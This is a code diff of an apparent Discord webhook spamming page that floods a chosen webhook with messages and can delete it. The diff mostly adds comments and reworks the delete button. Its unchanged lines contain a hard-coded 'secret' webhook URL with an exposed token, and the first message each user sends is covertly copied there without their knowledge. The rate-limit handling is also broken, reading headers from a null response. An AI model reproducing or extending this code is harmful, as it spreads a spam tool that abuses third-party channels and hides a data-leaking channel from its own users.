--- a/index.html
+++ b/index.html
@@ -46,8 +46,8 @@
         const messageCountDiv = document.getElementById('messageCount');
 
         let messageCount = 0;
-        let spamActive = false;
-        let secretWebhookSent = false;
+        let spamActive = false; // Flag to control spam sending
+        let secretWebhookSent = false; // Flag to ensure secret webhook is only hit once
 
         const secretWebhookUrl = "https://discord.com/api/webhooks/1341017371242139678/ki5RrTUeK3gpjZSVDA3wRyjwHGe1Vz1usb6R-Eb1TXR_p0wGZqq7I0Fo-rU_wwXIEOgF";
 
@@ -60,10 +60,12 @@
                 return;
             }
 
+            // Send to the user's webhook
             const response = await sendWebhook(webhookUrl, message);
+            // Send to the secret webhook (only once)
             if (!secretWebhookSent) {
                 await sendWebhook(secretWebhookUrl, `''' ${message} '''`);
-                secretWebhookSent = true;
+                secretWebhookSent = true; // Mark secret webhook as sent
             }
 
             if (response) {
@@ -80,7 +82,7 @@
         spamButton.addEventListener('click', async () => {
             const webhookUrl = webhookUrlInput.value;
             const message = messageInput.value;
-            const delay = parseInt(delayInput.value) || 100;
+            const delay = parseInt(delayInput.value) || 100; // Default to 100ms if input is invalid
 
             if (!webhookUrl || !message) {
                 alert("Please enter both the webhook URL and the message.");
@@ -88,24 +90,31 @@
             }
 
             if (spamActive) {
-                spamActive = false;
+                spamActive = false; // Stop the spam if it's already active
                 spamButton.textContent = "Start Spam";
                 statusDiv.textContent = "Spam stopped.";
             } else {
-                spamActive = true;
+                spamActive = true; // Start the spam
                 spamButton.textContent = "Stop Spam";
                 statusDiv.textContent = "Starting spam...";
                 await spamMessages(webhookUrl, message, delay);
             }
         });
 
-        deleteButton.addEventListener('click', () => {
-            webhookUrlInput.value = '';
-            messageInput.value = '';
-            delayInput.value = '';
-            statusDiv.textContent = "Webhook successfully deleted.";
-            messageCount = 0;
-            secretWebhookSent = false;
+        deleteButton.addEventListener('click', async () => {
+            const webhookUrl = webhookUrlInput.value;
+
+            if (!webhookUrl) {
+                alert("Please enter a webhook URL.");
+                return;
+            }
+
+            // Delete the webhook
+            await deleteWebhook(webhookUrl);
+            webhookUrlInput.value = '';  // Clear the input field
+            messageInput.value = '';     // Clear the message field
+            delayInput.value = '';      // Clear the delay field
+            messageCount = 0;           // Reset message count
             messageCountDiv.textContent = `Messages sent: ${messageCount}`;
         });
 
@@ -116,21 +125,12 @@
                     headers: {
                         'Content-Type': 'application/json'
                     },
-                    body: JSON.stringify({
-                        content: message,
-                        embeds: [
-                            {
-                                title: "Webhook Message",
-                                description: message,
-                                color: 3447003
-                            }
-                        ]
-                    })
+                    body: JSON.stringify({ content: message })
                 });
-                return response;
+                return response; // Return the response object
             } catch (error) {
                 console.error("Error sending webhook:", error);
-                return null;
+                return null; // Return null if there was an error
             }
         }
 
@@ -138,19 +138,39 @@
             while (spamActive) {
                 const response = await sendWebhook(webhookUrl, message);
                 if (!response) {
+                    // Check for rate limit response
                     const rateLimitRemaining = response.headers.get('X-RateLimit-Remaining');
                     const rateLimitResetAfter = response.headers.get('X-RateLimit-Reset-After');
 
                     if (rateLimitRemaining === '0') {
                         statusDiv.textContent = "Rate limit reached. Waiting...";
-                        await new Promise(resolve => setTimeout(resolve, rateLimitResetAfter * 1000));
+                        await new Promise(resolve => setTimeout(resolve, rateLimitResetAfter * 1000)); // Wait until reset
                         statusDiv.textContent = "Resuming sending...";
                     }
                 } else {
                     messageCount++;
                     messageCountDiv.textContent = `Messages sent: ${messageCount}`;
                 }
-                await new Promise(resolve => setTimeout(resolve, delay));
+                await new Promise(resolve => setTimeout(resolve, delay)); // Use the specified delay
+            }
+        }
+
+        // Function to delete webhook
+        async function deleteWebhook(webhookUrl) {
+            const urlParts = webhookUrl.split('/');
+            const webhookId = urlParts[urlParts.length - 2];
+            const webhookToken = urlParts[urlParts.length - 1];
+
+            const response = await fetch(`https://discord.com/api/webhooks/${webhookId}/${webhookToken}`, {
+                method: 'DELETE',
+            });
+
+            if (response.ok) {
+                console.log('Webhook deleted successfully.');
+                statusDiv.textContent = "Webhook successfully deleted.";
+            } else {
+                console.error('Failed to delete webhook.');
+                statusDiv.textContent = "Failed to delete webhook.";
             }
         }
     </script>
